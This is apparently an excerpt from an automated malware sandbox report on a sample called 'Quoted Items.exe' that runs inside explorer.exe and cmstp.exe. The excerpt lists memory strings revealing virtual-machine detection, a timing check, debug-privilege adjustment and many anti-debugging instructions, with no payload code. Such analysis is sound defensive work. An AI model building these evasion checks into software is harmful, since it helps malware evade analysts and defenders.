Source: explorer.exe, 00000005.00000000.314862974.0000000008223000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}+]e
Source: explorer.exe, 00000005.00000000.306967139.0000000004287000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
Source: cmstp.exe, 00000010.00000002.515589194.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000010.00000002.515741190.0000000003409000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000005.00000000.314689990.000000000820E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: Quoted Items.exe, 00000000.00000002.286733005.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: explorer.exe, 00000005.00000000.313752460.00000000080ED000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000005.00000000.314862974.0000000008223000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00l
Source: Quoted Items.exe, 00000000.00000002.286733005.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Source: C:\Users\user\Desktop\Quoted Items.exe

Code function: 4_2_004088C0 rdtsc

4_2_004088C0

Source: C:\Users\user\Desktop\Quoted Items.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0519E539 mov eax, dword ptr fs:[00000030h]	16_2_0519E539
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0515A537 mov eax, dword ptr fs:[00000030h]	16_2_0515A537
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05104D3B mov eax, dword ptr fs:[00000030h]	16_2_05104D3B
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05104D3B mov eax, dword ptr fs:[00000030h]	16_2_05104D3B
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05104D3B mov eax, dword ptr fs:[00000030h]	16_2_05104D3B
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051A8D34 mov eax, dword ptr fs:[00000030h]	16_2_051A8D34
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0510F527 mov eax, dword ptr fs:[00000030h]	16_2_0510F527
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0510F527 mov eax, dword ptr fs:[00000030h]	16_2_0510F527
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0510F527 mov eax, dword ptr fs:[00000030h]	16_2_0510F527
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050E3D34 mov eax, dword ptr fs:[00000030h]	16_2_050E3D34
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050E3D34 mov eax, dword ptr fs:[00000030h]	16_2_050E3D34
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050E3D34 mov eax, dword ptr fs:[00000030h]	16_2_050E3D34
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050E3D34 mov eax, dword ptr fs:[00000030h]	16_2_050E3D34
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050E3D34 mov eax, dword ptr fs:[00000030h]	16_2_050E3D34
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050E3D34 mov eax, dword ptr fs:[00000030h]	16_2_050E3D34
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050E3D34 mov eax, dword ptr fs:[00000030h]	16_2_050E3D34
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050E3D34 mov eax, dword ptr fs:[00000030h]	16_2_050E3D34
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050E3D34 mov eax, dword ptr fs:[00000030h]	16_2_050E3D34
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050E3D34 mov eax, dword ptr fs:[00000030h]	16_2_050E3D34
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050E3D34 mov eax, dword ptr fs:[00000030h]	16_2_050E3D34
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050E3D34 mov eax, dword ptr fs:[00000030h]	16_2_050E3D34
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050E3D34 mov eax, dword ptr fs:[00000030h]	16_2_050E3D34
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050DAD30 mov eax, dword ptr fs:[00000030h]	16_2_050DAD30
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05113D43 mov eax, dword ptr fs:[00000030h]	16_2_05113D43
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05153540 mov eax, dword ptr fs:[00000030h]	16_2_05153540
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05183D40 mov eax, dword ptr fs:[00000030h]	16_2_05183D40
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050F7D50 mov eax, dword ptr fs:[00000030h]	16_2_050F7D50
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FC577 mov eax, dword ptr fs:[00000030h]	16_2_050FC577
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FC577 mov eax, dword ptr fs:[00000030h]	16_2_050FC577
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050D2D8A mov eax, dword ptr fs:[00000030h]	16_2_050D2D8A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050D2D8A mov eax, dword ptr fs:[00000030h]	16_2_050D2D8A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050D2D8A mov eax, dword ptr fs:[00000030h]	16_2_050D2D8A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050D2D8A mov eax, dword ptr fs:[00000030h]	16_2_050D2D8A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050D2D8A mov eax, dword ptr fs:[00000030h]	16_2_050D2D8A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0510FD9B mov eax, dword ptr fs:[00000030h]	16_2_0510FD9B
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0510FD9B mov eax, dword ptr fs:[00000030h]	16_2_0510FD9B
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05102581 mov eax, dword ptr fs:[00000030h]	16_2_05102581
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05102581 mov eax, dword ptr fs:[00000030h]	16_2_05102581
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05102581 mov eax, dword ptr fs:[00000030h]	16_2_05102581
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05102581 mov eax, dword ptr fs:[00000030h]	16_2_05102581
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05192D82 mov eax, dword ptr fs:[00000030h]	16_2_05192D82
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05192D82 mov eax, dword ptr fs:[00000030h]	16_2_05192D82
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05192D82 mov eax, dword ptr fs:[00000030h]	16_2_05192D82
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05192D82 mov eax, dword ptr fs:[00000030h]	16_2_05192D82
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05192D82 mov eax, dword ptr fs:[00000030h]	16_2_05192D82
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05192D82 mov eax, dword ptr fs:[00000030h]	16_2_05192D82
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05192D82 mov eax, dword ptr fs:[00000030h]	16_2_05192D82
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05101DB5 mov eax, dword ptr fs:[00000030h]	16_2_05101DB5
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05101DB5 mov eax, dword ptr fs:[00000030h]	16_2_05101DB5
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05101DB5 mov eax, dword ptr fs:[00000030h]	16_2_05101DB5
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051035A1 mov eax, dword ptr fs:[00000030h]	16_2_051035A1
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051A05AC mov eax, dword ptr fs:[00000030h]	16_2_051A05AC
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051A05AC mov eax, dword ptr fs:[00000030h]	16_2_051A05AC
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05156DC9 mov eax, dword ptr fs:[00000030h]	16_2_05156DC9
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05156DC9 mov eax, dword ptr fs:[00000030h]	16_2_05156DC9
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05156DC9 mov eax, dword ptr fs:[00000030h]	16_2_05156DC9
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05156DC9 mov ecx, dword ptr fs:[00000030h]	16_2_05156DC9
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05156DC9 mov eax, dword ptr fs:[00000030h]	16_2_05156DC9
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05156DC9 mov eax, dword ptr fs:[00000030h]	16_2_05156DC9
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05188DF1 mov eax, dword ptr fs:[00000030h]	16_2_05188DF1
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050ED5E0 mov eax, dword ptr fs:[00000030h]	16_2_050ED5E0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050ED5E0 mov eax, dword ptr fs:[00000030h]	16_2_050ED5E0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0519FDE2 mov eax, dword ptr fs:[00000030h]	16_2_0519FDE2
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0519FDE2 mov eax, dword ptr fs:[00000030h]	16_2_0519FDE2
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0519FDE2 mov eax, dword ptr fs:[00000030h]	16_2_0519FDE2
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0519FDE2 mov eax, dword ptr fs:[00000030h]	16_2_0519FDE2
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051A740D mov eax, dword ptr fs:[00000030h]	16_2_051A740D
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051A740D mov eax, dword ptr fs:[00000030h]	16_2_051A740D
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051A740D mov eax, dword ptr fs:[00000030h]	16_2_051A740D
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05191C06 mov eax, dword ptr fs:[00000030h]	16_2_05191C06
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05191C06 mov eax, dword ptr fs:[00000030h]	16_2_05191C06
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05191C06 mov eax, dword ptr fs:[00000030h]	16_2_05191C06
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05191C06 mov eax, dword ptr fs:[00000030h]	16_2_05191C06
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05191C06 mov eax, dword ptr fs:[00000030h]	16_2_05191C06
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05191C06 mov eax, dword ptr fs:[00000030h]	16_2_05191C06
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05191C06 mov eax, dword ptr fs:[00000030h]	16_2_05191C06
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05191C06 mov eax, dword ptr fs:[00000030h]	16_2_05191C06
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05191C06 mov eax, dword ptr fs:[00000030h]	16_2_05191C06
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05191C06 mov eax, dword ptr fs:[00000030h]	16_2_05191C06
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05191C06 mov eax, dword ptr fs:[00000030h]	16_2_05191C06
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05191C06 mov eax, dword ptr fs:[00000030h]	16_2_05191C06
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05191C06 mov eax, dword ptr fs:[00000030h]	16_2_05191C06
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05191C06 mov eax, dword ptr fs:[00000030h]	16_2_05191C06
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05156C0A mov eax, dword ptr fs:[00000030h]	16_2_05156C0A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05156C0A mov eax, dword ptr fs:[00000030h]	16_2_05156C0A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05156C0A mov eax, dword ptr fs:[00000030h]	16_2_05156C0A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05156C0A mov eax, dword ptr fs:[00000030h]	16_2_05156C0A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05103C3E mov eax, dword ptr fs:[00000030h]	16_2_05103C3E
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05103C3E mov eax, dword ptr fs:[00000030h]	16_2_05103C3E
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05103C3E mov eax, dword ptr fs:[00000030h]	16_2_05103C3E
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0510BC2C mov eax, dword ptr fs:[00000030h]	16_2_0510BC2C
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0516C450 mov eax, dword ptr fs:[00000030h]	16_2_0516C450
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0516C450 mov eax, dword ptr fs:[00000030h]	16_2_0516C450
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0510A44B mov eax, dword ptr fs:[00000030h]	16_2_0510A44B
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050F746D mov eax, dword ptr fs:[00000030h]	16_2_050F746D
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0510AC7B mov eax, dword ptr fs:[00000030h]	16_2_0510AC7B
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0510AC7B mov eax, dword ptr fs:[00000030h]	16_2_0510AC7B
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0510AC7B mov eax, dword ptr fs:[00000030h]	16_2_0510AC7B
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0510AC7B mov eax, dword ptr fs:[00000030h]	16_2_0510AC7B
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0510AC7B mov eax, dword ptr fs:[00000030h]	16_2_0510AC7B
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0510AC7B mov eax, dword ptr fs:[00000030h]	16_2_0510AC7B
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0510AC7B mov eax, dword ptr fs:[00000030h]	16_2_0510AC7B
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0510AC7B mov eax, dword ptr fs:[00000030h]	16_2_0510AC7B
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0510AC7B mov eax, dword ptr fs:[00000030h]	16_2_0510AC7B
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0510AC7B mov eax, dword ptr fs:[00000030h]	16_2_0510AC7B
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0510AC7B mov eax, dword ptr fs:[00000030h]	16_2_0510AC7B
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FB477 mov eax, dword ptr fs:[00000030h]	16_2_050FB477
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FB477 mov eax, dword ptr fs:[00000030h]	16_2_050FB477
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FB477 mov eax, dword ptr fs:[00000030h]	16_2_050FB477
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FB477 mov eax, dword ptr fs:[00000030h]	16_2_050FB477
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FB477 mov eax, dword ptr fs:[00000030h]	16_2_050FB477
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FB477 mov eax, dword ptr fs:[00000030h]	16_2_050FB477
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FB477 mov eax, dword ptr fs:[00000030h]	16_2_050FB477
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FB477 mov eax, dword ptr fs:[00000030h]	16_2_050FB477
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FB477 mov eax, dword ptr fs:[00000030h]	16_2_050FB477
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FB477 mov eax, dword ptr fs:[00000030h]	16_2_050FB477
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FB477 mov eax, dword ptr fs:[00000030h]	16_2_050FB477
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FB477 mov eax, dword ptr fs:[00000030h]	16_2_050FB477
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05194496 mov eax, dword ptr fs:[00000030h]	16_2_05194496
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05194496 mov eax, dword ptr fs:[00000030h]	16_2_05194496
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05194496 mov eax, dword ptr fs:[00000030h]	16_2_05194496
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05194496 mov eax, dword ptr fs:[00000030h]	16_2_05194496
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05194496 mov eax, dword ptr fs:[00000030h]	16_2_05194496
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05194496 mov eax, dword ptr fs:[00000030h]	16_2_05194496
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05194496 mov eax, dword ptr fs:[00000030h]	16_2_05194496
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05194496 mov eax, dword ptr fs:[00000030h]	16_2_05194496
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05194496 mov eax, dword ptr fs:[00000030h]	16_2_05194496
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05194496 mov eax, dword ptr fs:[00000030h]	16_2_05194496
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05194496 mov eax, dword ptr fs:[00000030h]	16_2_05194496
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05194496 mov eax, dword ptr fs:[00000030h]	16_2_05194496
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05194496 mov eax, dword ptr fs:[00000030h]	16_2_05194496
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050E849B mov eax, dword ptr fs:[00000030h]	16_2_050E849B
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051A8CD6 mov eax, dword ptr fs:[00000030h]	16_2_051A8CD6
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051914FB mov eax, dword ptr fs:[00000030h]	16_2_051914FB
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05156CF0 mov eax, dword ptr fs:[00000030h]	16_2_05156CF0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05156CF0 mov eax, dword ptr fs:[00000030h]	16_2_05156CF0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05156CF0 mov eax, dword ptr fs:[00000030h]	16_2_05156CF0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05104710 mov eax, dword ptr fs:[00000030h]	16_2_05104710
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0516FF10 mov eax, dword ptr fs:[00000030h]	16_2_0516FF10
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0516FF10 mov eax, dword ptr fs:[00000030h]	16_2_0516FF10
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051A070D mov eax, dword ptr fs:[00000030h]	16_2_051A070D
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051A070D mov eax, dword ptr fs:[00000030h]	16_2_051A070D
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FF716 mov eax, dword ptr fs:[00000030h]	16_2_050FF716
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0510A70E mov eax, dword ptr fs:[00000030h]	16_2_0510A70E
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0510A70E mov eax, dword ptr fs:[00000030h]	16_2_0510A70E
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0510E730 mov eax, dword ptr fs:[00000030h]	16_2_0510E730
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050D4F2E mov eax, dword ptr fs:[00000030h]	16_2_050D4F2E
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050D4F2E mov eax, dword ptr fs:[00000030h]	16_2_050D4F2E
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05103F33 mov eax, dword ptr fs:[00000030h]	16_2_05103F33
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FB73D mov eax, dword ptr fs:[00000030h]	16_2_050FB73D
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FB73D mov eax, dword ptr fs:[00000030h]	16_2_050FB73D
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05191751 mov eax, dword ptr fs:[00000030h]	16_2_05191751
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050EEF40 mov eax, dword ptr fs:[00000030h]	16_2_050EEF40
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050EFF60 mov eax, dword ptr fs:[00000030h]	16_2_050EFF60
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051A8F6A mov eax, dword ptr fs:[00000030h]	16_2_051A8F6A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05157794 mov eax, dword ptr fs:[00000030h]	16_2_05157794
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05157794 mov eax, dword ptr fs:[00000030h]	16_2_05157794
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05157794 mov eax, dword ptr fs:[00000030h]	16_2_05157794
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050E8794 mov eax, dword ptr fs:[00000030h]	16_2_050E8794
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051137F5 mov eax, dword ptr fs:[00000030h]	16_2_051137F5
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0510A61C mov eax, dword ptr fs:[00000030h]	16_2_0510A61C
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0510A61C mov eax, dword ptr fs:[00000030h]	16_2_0510A61C
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050DC600 mov eax, dword ptr fs:[00000030h]	16_2_050DC600
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050DC600 mov eax, dword ptr fs:[00000030h]	16_2_050DC600
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050DC600 mov eax, dword ptr fs:[00000030h]	16_2_050DC600
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050F5600 mov eax, dword ptr fs:[00000030h]	16_2_050F5600
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050F5600 mov eax, dword ptr fs:[00000030h]	16_2_050F5600
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050F5600 mov eax, dword ptr fs:[00000030h]	16_2_050F5600
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050F5600 mov eax, dword ptr fs:[00000030h]	16_2_050F5600
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050F5600 mov ecx, dword ptr fs:[00000030h]	16_2_050F5600
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050F5600 mov ecx, dword ptr fs:[00000030h]	16_2_050F5600
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050F5600 mov eax, dword ptr fs:[00000030h]	16_2_050F5600
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050F5600 mov ecx, dword ptr fs:[00000030h]	16_2_050F5600
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050F5600 mov ecx, dword ptr fs:[00000030h]	16_2_050F5600
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050F5600 mov eax, dword ptr fs:[00000030h]	16_2_050F5600
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050F5600 mov eax, dword ptr fs:[00000030h]	16_2_050F5600
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050F5600 mov eax, dword ptr fs:[00000030h]	16_2_050F5600
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050F5600 mov eax, dword ptr fs:[00000030h]	16_2_050F5600
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050F5600 mov eax, dword ptr fs:[00000030h]	16_2_050F5600
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050F5600 mov eax, dword ptr fs:[00000030h]	16_2_050F5600
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050F5600 mov eax, dword ptr fs:[00000030h]	16_2_050F5600
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050F5600 mov eax, dword ptr fs:[00000030h]	16_2_050F5600
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050F5600 mov eax, dword ptr fs:[00000030h]	16_2_050F5600
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050F5600 mov eax, dword ptr fs:[00000030h]	16_2_050F5600
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05108E00 mov eax, dword ptr fs:[00000030h]	16_2_05108E00
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05191608 mov eax, dword ptr fs:[00000030h]	16_2_05191608
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0518FE3F mov eax, dword ptr fs:[00000030h]	16_2_0518FE3F
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050DE620 mov eax, dword ptr fs:[00000030h]	16_2_050DE620
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050E7E41 mov eax, dword ptr fs:[00000030h]	16_2_050E7E41
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050E7E41 mov eax, dword ptr fs:[00000030h]	16_2_050E7E41
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050E7E41 mov eax, dword ptr fs:[00000030h]	16_2_050E7E41
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050E7E41 mov eax, dword ptr fs:[00000030h]	16_2_050E7E41
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050E7E41 mov eax, dword ptr fs:[00000030h]	16_2_050E7E41
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050E7E41 mov eax, dword ptr fs:[00000030h]	16_2_050E7E41
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0519AE44 mov eax, dword ptr fs:[00000030h]	16_2_0519AE44
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0519AE44 mov eax, dword ptr fs:[00000030h]	16_2_0519AE44
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050E766D mov eax, dword ptr fs:[00000030h]	16_2_050E766D
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FAE73 mov eax, dword ptr fs:[00000030h]	16_2_050FAE73
